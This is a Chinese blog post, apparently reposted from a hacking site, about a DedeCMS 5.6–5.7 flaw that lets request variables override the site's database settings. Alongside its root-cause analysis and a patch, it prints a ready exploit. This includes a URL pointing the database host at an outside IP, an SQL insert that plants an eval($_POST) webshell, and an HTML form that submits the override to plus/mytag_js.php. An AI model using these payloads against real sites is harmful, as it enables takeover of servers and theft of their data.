详细分析下dedecms的这个劫持数据库洞子

 漏洞不是我发的，这里仅仅只是分析这个漏洞的成因    

    今天看到微博看到dedecms出洞了，上土司看了一下，同一个问题，暂时公布的有2个位置，

dede/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

    上面这个是知道后台地址的利用方式

    另外一种以下，下本地装一个dede，执行一下语句，很简单，写了一个dedetag，生成shell的

SQL 语句： insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?php eval($_POST[c]) ?>\');echo "OK";@fclose($fp);{/dede:php}');

    再用构造的表单提交数据库信息到plus/mytag_js.php?aid=1，覆盖掉数据库的全局参数，致使目标站的mysql类连接到黑客构造的mysql数据库，shell 在同目录下 1.php

    分析下mytag_js.php，一开始引用了配置文件，跟进去看看：

require_once(dirname(__FILE__).'/../include/common.inc.php');

    会发现下面代码：

如下是引用片断： if (!defined('DEDEREQUEST'))   {      //检查和注册外部提交的变量      foreach($_REQUEST as $_k=>$_v)//这里是关键，      {          if( strlen($_k)>0 && preg_match('/^(cfg_|GLOBALS)/',$_k) )//这里是关键，          {//若是键名中有cfg_或GLOBALS,就退出了              exit('Request var not allow!');          }      }      foreach(Array('_GET','_POST','_COOKIE') as $_request)      {          foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);//addslashes过滤的      }  }

    上面这个套路过滤了引号之类的注入问题，变量覆盖虽有过滤，可是没过滤彻底，被多维数组绕过了，

    如_COOKIE[GLOBALS][cfg_dbuser]这个变量，foreach($_REQUEST as $_k=>$_v)以后，这个$k变成_COOKIE，从而绕过了过滤

    $v变成了[GLOBALS][cfg_dbuser]，从而覆盖了data/common.inc.php中的数据库配置变量，

    测试5.6 ，5.7都存在，用dedecms的站很是多，此次估计得悲剧一大片。

    修补的方法官方论坛有位斑竹给出了代码，以下

    找到include/common.inc.php文件

    找到

foreach($_REQUEST as $_k=>$_v)
{
if( strlen($_k)>0 && eregi('^(cfg_|GLOBALS)',$_k) )
{
  exit('Request var not allow!');
}
}

    替换为下面的代码：

function CheckRequest(&$val) {
        if (is_array($val)) {
            foreach ($val as $_k=>$_v) {
                CheckRequest($_k); 
                CheckRequest($val[$_k]);
            }
        } else
        {
            if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
            {
                exit('Request var not allow!');
            }
        }
    }
CheckRequest($_REQUEST);

------------------------------------------------------------------------------------------------

    By：jannock

    漏洞细节已经传遍了（http://www.t00ls.net/thread-17354-1-1.html，http://lcx.cc/?FoxNews=1681.html），又没得玩了。

    网传的都是说要知道后台才能利用，但不用，只要 plus 目录存在，服务器能外连，就能拿shell。

    前题条件，必须准备好本身的dede数据库，而后插入数据：

如下是引用片断： insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?php eval($_POST[c]) ?>\');echo "OK";@fclose($fp);{/dede:php}');

    再用下面表单提交，shell 就在同目录下  1.php。原理本身研究。。。

如下是引用片断： <form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();"> <input type="text" value="http://localhost:8080/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br /> <input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br /> <input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br /> <input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br /> <input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br /> <input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br /> <input type="text" value="true" name="nocache" style="width:400"> <input type="submit" value="提交" name="QuickSearchBtn"><br /> </form> <script> function addaction() { document.QuickSearch.action=document.QuickSearch.doaction.value; } </script>

本文“DedeCms v5.6-5.7 爆严重安全漏洞 …… - 拿 WebShell EXP”，来自：Nuclear'Atk 网络安全研究中心，本文地址：http://lcx.cc/?i=1682，转载请注明做者及出处！